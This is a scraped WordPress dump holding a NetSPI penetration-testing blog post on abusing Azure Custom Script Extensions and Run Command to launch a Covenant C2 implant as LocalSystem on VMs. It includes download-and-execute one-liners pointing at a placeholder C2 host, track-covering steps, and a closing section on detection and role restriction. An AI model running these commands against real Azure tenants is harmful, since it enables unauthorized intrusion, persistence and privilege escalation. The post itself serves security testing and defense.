[post_title] => Decrypting Azure VM Extension Settings with Get-AzureVMExtensionSettings [post_excerpt] => [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => decrypting-azure-vm-extension-settings-with-get-azurevmextensionsettings [to_ping] => [pinged] => [post_modified] => 2021-04-13 00:05:25 [post_modified_gmt] => 2021-04-13 00:05:25 [post_content_filtered] => [post_parent] => 0 [guid] => https://blog.netspi.com/?p=11367 [menu_order] => 516 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [13] => WP_Post Object ( [ID] => 11255 [post_author] => 52 [post_date] => 2020-02-13 07:00:22 [post_date_gmt] => 2020-02-13 07:00:22 [post_content] => PowerShell and Bash scripts are excellent tools for automating simple or repetitive tasks. Azure values this and provides several mechanisms for remotely running scripts and commands in virtual machines (VMs). While there are many practical, safe uses of these Azure features, they can also be used maliciously. In this post we’ll explore how the Custom Script Extension and Run Command functionality could be leveraged by an attacker to establish a foothold in an environment, which could be used to persist access and escalate privileges.

Background

Before we dive into how an attacker would make use of the Custom Script Extension and Run Command features, let’s first understand what they are and their intended uses.

Custom Script Extension

Azure provides a large selection of virtual machine (VM) extensions which perform post-deployment automation tasks on Azure VMs. Typical tasks performed by VM extensions include anti-virus deployment, VM configuration, and application deployment/monitoring. The Custom Script Extension is particularly interesting as it downloads a script from a user-specified location (e.g. URL, blob storage, etc.) and then executes the script on a running Azure Windows or Linux VM. The typical usage of Custom Script Extensions is for one-time setup tasks, like installing an IIS Server, but since it runs an arbitrary script, it could perform just about anything.

Run Command

The Run Command feature connects to the Virtual Machine Agent to run commands and scripts. The scripts can be provided through the Azure Portal, REST API, Azure CLI, or PowerShell. An advantage of the Run Command feature is that commands can be executed even when the VM is otherwise unreachable (e.g. if the RDP or SSH ports are closed). This makes the Run Command feature particularly useful for diagnosing VM and network issues.

Key Similarities

While there are differences between the two features, there are some key similarities that make them particularly useful to attackers and penetration testers:
  1. Both features are available to a user with the Virtual Machine Contributor role.
  2. Both features run user-supplied commands in any VM that the user can access.
  3. Both features run the commands as the LocalSystem account on the VM.

Scenario:

Now that we understand some of the features available to us, the let’s explore how an attacker could utilize these features for their own purposes. We’ll play the role of a penetration tester who has compromised (or been provided with) an account which has the VM Contributor role in Azure. This role would allow us to "manage virtual machines, but not access to them, and not the virtual network or storage account they're connected to" (link). Our goal is to maintain access to the environment and escalate our privileges.

Attack Overview

At a high-level, here are the steps our proof-of-concept attack will take:
  1. We’ll set up a Covenant command and control (C2) server outside of the target Azure environment. This server will host a PowerShell script (the "Launcher") which when executed in a VM will run the Covenant implant (the “Grunt”).
  2. Through the Azure Portal, we’ll identify our target virtual machine(s) and add a Custom Script Extension. This Custom Script Extension will download our Powershell Launcher and start the Grunt. This will connect back to the C2 server, and allow us to run commands as LocalSystem on the VM.
  3. Once we’ve established access, we’ll exit out and cover our tracks by removing the extension.
  4. For demonstration purposes, we’ll also repeat this process using the Run Command feature by sending a PowerShell command which will execute our Launch and run another Grunt.
While this proof-of-concept attack will be focused on Windows VMs and tooling, but the same concepts and features are equally applicable to Azure Linux VMs.

1: Covenant Command and Control Server Setup

Let’s start by setting up Covenant. Covenant is an advanced .NET command and control framework. We’ll be installing Covenant on a server we control, outside of the Azure environment that we’re attacking. In this proof of concept, we’ll be using c2.netspi.invalid as our C2 server. This is not a real DNS name, but it illustrates the concept. I’ll skip past installation and startup because solid guides are available on the Covenant Wiki. Once Covenant is installed and running, the UI is available on port 7443 by default. We’ll navigate to the webpage, register an initial admin user and login. Once logged in, create an HTTP Listener. The listener will monitor a specified port awaiting traffic from the Grunt that we’ll run on our VM. The listener lets us send commands to, and receive results from, the Grunt implant. Covenant Http Listener Note that “BindAddress” is 0.0.0.0 which allows Covenant to bind port 80 for all available IPv4 address on the local machine (where Covenant is running). The “ConnectAddress” is a DNS name for our C2 server. This value is used to generate the URL which the Grunt will communicate with. Once a listener is created, we need to create and host our Launcher. The Launcher is a PowerShell script which we’ll run in the target VM to start the Grunt. For this demo, we’ll use Covenant’s out-of-the-box PowerShell launcher. It’s important to note that this exact script is likely to be caught by anti-virus once the VM attempts to run it, but I’ve simply disabled anti-virus for the proof-of-concept. Typically, the Launcher script would need to be altered and obfuscated to avoid detection. Once we’ve selected the PowerShell option from the Launcher Menu, we’ll first generate our script. The default options are fine for our test. Covenant Launchers After clicking the Generate button, we’ll navigate to the Host tab and provide a path where the script will be hosted and available from our C2 server. After we click the Host button, our script is now available for download from our server, and the UI provides a convenient PowerShell script to download and execute the Launcher. Covenant Launchers Our Covenant C2 server is now ready. The PowerShell Launcher script is available for download at https://c2.netspi.invalid/netspi/launcher.ps1. The Launcher will run the Grunt, which will connect back to the Covenant server to receive commands and send results. We could actually host the PowerShell Launcher script anywhere. For example, we could host the script in GitHub or in Azure blob storage. If someone were to review the executed commands later, a script downloaded from these locations would be less suspicious. For this proof-of-concept, I prefer to use Covenant’s ability to easily host the launcher itself.

2: Use a Custom Script Extension to Launch the Implant

Thus far, all the work has been preparation. We’ve learned about the features available to us. We’ve set up our tools. Here comes the attack. We’ll use the Azure Cloud Shell, but the same steps could be performed through Azure’s Portal web interface as well. We’ll start by listing the VMs available to us using the Get-AzVM cmdlet.
PS Azure:\> Get-AzVM | Format-Table -Wrap -AutoSize -Property ResourceGroupName,Name,Location
ResourceGroupName   Name      Location
-----------------   ----      --------
TESTER              CSETest   westcentralus
We’re able identify a VM named “CSETest” running in the environment. We can now use the Set-AzVMCustomScriptExtension cmdlet to add a Custom Script Extension to that VM. Before issuing the shell command, let’s review the parameters we’ll pass to the cmdlet:
  1. -ResourceGroupName TESTER
    1. The ResourceGroupName as identified in the previous command results.
  2. -VMName CSETest
    1. The VM Name as identified in the previous command results.
  3. -Location westcentralus
    1. The location of the VM as identified in the previous command results.
  4. -FileUri 'https://c2.netspi.invalid/netspi/launcher.ps1'
    1. The URL where our Powershell Launcher is hosted by out Covenant server.
  5. -Run 'launcher.ps1'
    1. The command used to execute the Launcher. In general, this is where script parameters could be passed.
  6. -Name CovenantScriptExtension
    1. An arbitrary name for our Custom Script Extension.
The moment we’ve all been waiting for, let’s run our Custom Script Extension:
PS Azure:\> Set-AzVMCustomScriptExtension -ResourceGroupName TESTER -VMName CSETest -Location westcentralus -FileUri 'https://c2.netspi.invalid/netspi/launcher.ps1' -Run 'launcher.ps1' -Name CovenantScriptExtension
Wait… it looks like nothing is happening in the Cloud Shell. This is because the PowerShell launcher is still running and has not yet terminated. If we return to our Covenant UI, we’ll receive a notification that a new Grunt has connected successfully. We’ll also be returned some basic information about the system on which it is running. In the screenshot below, note that that the Hostname and OperatingSystem are correct for our targeted VM. Covenant Grunts With only a couple of commands, our implant is successfully running on the targeted VM. If we click on the Grunt’s name, we can interact with it and issues further commands. In the screenshot below, we confirm that the Grunt is running as the LocalSystem account. Covenant Grunts That’s it. We have a SYSTEM process running on the target VM under our control. We have many options from here including establishing persistence and escalating our privileges further. For example we could:
  • Dump hashes/credentials with Invoke-Mimikatz.
  • Install a service to launch ensure a Grunt is started if the VM is restarted.
  • Search for sensitive files saved on the VM.
  • Enumerate domain information to target other VMs.
For now, we’ll stop this Grunt by issuing it the “Kill” command from the Covenant UI. If we return to our Cloud Shell, we’ll see that we finally have some output:
PS Azure:\> Set-AzVMCustomScriptExtension -ResourceGroupName TESTER -VMName CSETest -Location westcentralus -FileUri 'https://c2.netspi.invalid/netspi/launcher.ps1' -Run 'launcher.ps1' -Name CovenantScriptExtension
RequestId IsSuccessStatusCode StatusCode ReasonPhrase
--------- ------------------- ---------- ------------
                         True         OK OK
After we killed the Grunt, the Custom Script Extension completed successfully. This indicates that the Custom Script Extension’s execution is tied to the Grunt. Due to Custom Script Extension’s 90 minute time limit, an attacker would need to accomplish their tasks within that timeframe. Alternatively, one could also establish persistence and open another Grunt, then allow the Custom Script Extension to finish successfully by killing the original Grunt.

3. Custom Script Extension Cleanup

Before moving on, let’s take a moment to cover our tracks and remove the Custom Script Extension. This can be accomplished with the Remove-AzVMCustomScriptExtension cmdlet. Its parameters are very similar to ones used for Set-AzVMCustomScriptExtension. When we run it in the Cloud Shell, we’ll see the following:
PS Azure:\> Remove-AzVMCustomScriptExtension -ResourceGroupName TESTER -VMName MGITest -Name CovenantScriptExtension

Virtual machine extension removal operation
This cmdlet will remove the specified virtual machine extension. Do you want to continue?
[Y] Yes  [N] No  [S] Suspend  [?] Help (default is "Y"): Y

RequestId IsSuccess StatusCode StatusCode ReasonPhrase
--------- ------------------- ---------- ------------
                         True         OK OK
Helpfully, this also removes the files which were written to C:\Packages\Plugins\Microsoft.Compute.CustomScriptExtension. These files are discussed in further detail at the end of this post.

4. Use the Run Command Feature to Launch Another Implant

In some cases, we may be unable to execute the Custom Script Extension. Perhaps our account doesn’t have appropriate privileges to do so. Maybe a Custom Script Extension has already been deployed so we can’t add another. Our alternative is to use the Run Command feature to run the same PowerShell Launcher and connect another Grunt. We’ll even get to keep the LocalSystem privileges. Since we have already identified the target VM, and Covenant has already provided a one-line command to download and run the Launcher, we’ll only need to issue a pass that command through Cloud Shell to the VM through the Run Command feature. We’ll use az vm run-command for this. Like we did before, let’s make sure we understand the command itself:
  1. az vm run-command invoke
    1. This set of keywords create a single logical command to "Execute a specific run command on a VM."
  2. --command-id RunPowerShellScript
    1. The command we intend to execute. We could choose from pre-built commands, but we would like to execute an arbitrary PowerShell script.
  3. --name CSETest
    1. The name of the VM.
  4. -g TESTER
    1. The name of the Resource Group.
  5. --scripts "iex (New-Object Net.WebClient).DownloadString('https://c2.netspi.invalid/netspi/launcher.ps1')"
    1. Typically, the "scripts" parameter is used to specific the name of a PowerShell script to execute. We are using it to specify the one-line command which downloads and runs the Launcher. As mentioned before, this one-line command is provided by Covenant in its UI.
  6. -Name CovenantScriptExtension
    1. An arbitrary name for our Custom Script Extension.
Now that we know what we’re doing, let’s run our command:
PS Azure:\> az vm run-command invoke --command-id RunPowerShellScript --name CSETest -g TESTER --scripts "iex (New-Object Net.WebClient).DownloadString('https://c2.netspi.invalid/netspi/launcher.ps1')"
- Running ..
At least this time we get some immediate feedback from Cloud Shell that something is happening. And after about 30 seconds, a new Grunt appears in our Covenant UI: Covenant Grunts Again, we can interact with the Grunt and confirm that the Grunt running as the LocalSystem account. Covenant Grunts As with the Custom Script Extension, we now have about 90 minutes before the command times out. Since we’re running as LocalSystem, we should have ample opportunity to establish persistence (if needed) and escalate privileges. If we send the "Kill" to the new Grunt and return to our Cloud Shell, we’ll see that the command output is updated reporting a successful execution.
{
  "value": [
    {
      "code": "ComponentStatus/StdOut/succeeded",
      "displayStatus": "Provisioning succeeded",
      "level": "Info",
      "message": "",
      "time": null
    },
    {
      "code": "ComponentStatus/StdErr/succeeded",
      "displayStatus": "Provisioning succeeded",
      "level": "Info",
      "message": "",
      "time": null
    }
  ]
}
Unlike the Custom Script Extension (which must be uninstalled before being deployed again), we could re-issue the same command in Cloud Shell to launch a new Grunt. If we have multiple target VMs, we could use Invoke-AzureRmVMRunCommand to execute the Launcher across many targets at once.

Monitoring this attack

For blue teamers, hopefully this post illustrates how granting Owner, Contributor, Virtual Machine Contributor or Log Analytics Contributor roles allows that user to have SYSTEM rights on all accessible VMs. With that access, they can embed themselves into the network, maintaining persistence and continuing to escalate. The silver lining here is that actions can be restricted by creating new roles and limiting permissions appropriately. The related actions that one may want to restrict are:
  • Microsoft.ClassicCompute/virtualMachines/extensions/write
  • Microsoft.Compute/virtualMachines/extensions/write
  • Microsoft.Compute/virtualMachines/runCommand/action
Additionally, the actions appear in the Activity Log for the targeted VM. If these actions aren’t regularly used in the organization, it’s straightforward to create Alerts for "Run Command on Virtual Machine" and "Create or Update Virtual Machine Extension." Vm Activity Log Lastly, there are file system changes on the target VM for each of the approaches. If trying to remain undetected, an attacker may remove these files, but not much can be done to prevent their creation.

Custom Script Extension Files

The script itself is downloaded to C:\Packages\Plugins\Microsoft.Compute.CustomScriptExtension<version>Downloads<other version><script name> when the Custom Script Extension is installed. For example, the PowerShell launcher in our proof-of-concept was downloaded to C:\Packages\Plugins\Microsoft.Compute.CustomScriptExtension1.10.3Downloadslauncher.ps1. If the Custom Extension is later uninstalled, the whole C:\Packages\Plugins\Microsoft.Compute.CustomScriptExtension folder is removed. The output from the Custom Script Extension (including logging from the script itself) is written to C:WindowsAzureLogsPluginsMicrosoft.Compute.CustomScriptExtension<version> folder. For example, our logs were written to the C:WindowsAzureLogsPluginsMicrosoft.Compute.CustomScriptExtension1.10.3 folder. These are not automatically deleted when the Custom Script Extension is uninstalled.

Run Command Files

The Run Command approach has similar file system artifacts. The supplied script is written to C:\Packages\Plugins\Microsoft.CPlat.Core.RunCommandWindows<version>Downloadsscript<number>.ps1. Any logging output from the script is written to the C:WindowsAzureLogsPluginsMicrosoft.CPlat.Core.RunCommandWindows<version> folder.

Acknowledgements

Thank you to Karl Fosaaen for the previous research and suggestion of how Custom Script Extensions could be utilized to launch implants. And thank you to cobbr at SpecterOps for publishing and maintaining Covenant, which was a pleasure to work with. [post_title] => Attacking Azure with Custom Script Extensions [post_excerpt] => [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => attacking-azure-with-custom-script-extensions [to_ping] => [pinged] => [post_modified] => 2023-06-13 09:44:39 [post_modified_gmt] => 2023-06-13 14:44:39 [post_content_filtered] => [post_parent] => 0 [guid] => https://blog.netspi.com/?p=11255 [menu_order] => 535 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) ) [post_count] => 14 [current_post] => -1 [before_loop] => 1 [in_the_loop] => [post] => WP_Post Object ( [ID] => 28369 [post_author] => 53 [post_date] => 2022-09-11 13:58:36 [post_date_gmt] => 2022-09-11 18:58:36 [post_content] =>
Watch Now

NetSPI Managing Consultant Jake Karnes spoke at the CrestCon UK 2022 conference at the Royal College of Physicians. During this session, Jake described how he found and responsibly disclosed a serious Microsoft vulnerability: The Kerberos Bronze Bit Attack.

Watch the recording below to:

  • Gain a high-level understanding of Kerberos and the Bronze Bit Attack
  • Get a behind-the-scenes look at the responsible vulnerability disclosure process
  • Learn from and apply Jake’s lessons learned from a critical vulnerability finding to your security testing practices

[wonderplugin_video iframe="https://youtu.be/aGiFRttHah4" lightbox=0 lightboxsize=1 lightboxwidth=1200 lightboxheight=674.999999999999916 autoopen=0 autoopendelay=0 autoclose=0 lightboxtitle="" lightboxgroup="" lightboxshownavigation=0 showimage="" lightboxoptions="" videowidth=1200 videoheight=674.999999999999916 keepaspectratio=1 autoplay=0 loop=0 videocss="position:relative;display:block;background-color:#000;overflow:hidden;max-width:100%;margin:0 auto;" playbutton="https://www.netspi.com/wp-content/plugins/wonderplugin-video-embed/engine/playvideo-64-64-0.png"]

[post_title] => Persistence is Vital: Key Lessons Learned when Finding and Discovering CVE-2020-17049 [post_excerpt] => [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => key-lessons-learned-cve-2020-17049 [to_ping] => [pinged] => [post_modified] => 2023-08-22 09:55:20 [post_modified_gmt] => 2023-08-22 14:55:20 [post_content_filtered] => [post_parent] => 0 [guid] => https://www.netspi.com/?post_type=webinars&p=28369 [menu_order] => 39 [post_type] => webinars [post_mime_type] => [comment_count] => 0 [filter] => raw ) [comment_count] => 0 [current_comment] => -1 [found_posts] => 14 [max_num_pages] => 0 [max_num_comment_pages] => 0 [is_single] => [is_preview] => [is_page] => [is_archive] => [is_date] => [is_year] => [is_month] => [is_day] => [is_time] => [is_author] => [is_category] => [is_tag] => [is_tax] => [is_search] => [is_feed] => [is_comment_feed] => [is_trackback] => [is_home] => 1 [is_privacy_policy] => [is_404] => [is_embed] => [is_paged] => [is_admin] => [is_attachment] => [is_singular] => [is_robots] => [is_favicon] => [is_posts_page] => [is_post_type_archive] => [query_vars_hash:WP_Query:private] => 7376901aea0750aa65b8e8855545a289 [query_vars_changed:WP_Query:private] => [thumbnails_cached] => [allow_query_attachment_by_filename:protected] => [stopwords:WP_Query:private] => [compat_fields:WP_Query:private] => Array ( [0] => query_vars_hash [1] => query_vars_changed ) [compat_methods:WP_Query:private] => Array ( [0] => init_query_flags [1] => parse_tax_query ) )

Discover how NetSPI ASM solution helps organizations identify, inventory, and reduce risk to both known and unknown assets.

X